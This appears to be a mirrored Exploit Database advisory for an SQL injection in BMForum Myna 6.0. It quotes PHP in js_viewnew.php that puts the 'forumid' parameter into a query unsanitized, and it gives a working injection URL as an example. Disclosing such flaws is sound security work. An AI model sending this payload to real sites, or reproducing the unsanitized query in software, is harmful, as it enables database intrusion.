BMForum Myna 6.0 – SQL Injection

Exploit Database
14 阅读

作者： Stephan Sattler

日期： 2011-03-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/16938/

# Author: Stephan Sattler
# Software Website: http://www.bmforum.com/
# Software Link: http://www.bmforum.com/down/
# Required: magic quotes = Off

[ Vulnerability ]
 
 /add-on/js_viewnew.php line 20++:

$length = $_GET['length'];
$forumid = $_GET['forumid'];
$num = $_GET['num'];
$forumnum=$forumid;

{....}

$query = "SELECT * FROM {$database_up}threads WHERE forumid='$forumid' ORDER BY 'changetime' DESC LIMIT 0,$num";

#Explanation:

$forumid($_GET['forumid']) isn't sanitized at all, an attacker could use this for an SQL-Injection.

#Example for an injection:

http://[site]/[folder]/js_viewnew.php?forumid=2'+AnD+1='1&num=1&length=1

last Exploits
BMForum Myna 6.0 – SQL Injection的更多信息

pL-PHP 0.9 – ‘index.php’ Cross-Site Scripting：
CMSUno 1.6.2 – ‘user’ Remote Code Execution (Authenticated)：
ZamFoo – Multiple Remote Command Execution Vulnerabilities：
Employee Work Schedule 5.9 – ‘cal_id’ SQL Injection：
Xibo 1.2.2/1.4.1 – ‘index.php?p’ Directory Traversal：
Project Man 1.0 – Authentication Bypass：
Symphony 2.2.4 – Cross-Site Request Forgery：
e107 0.7.23 – SQL Injection：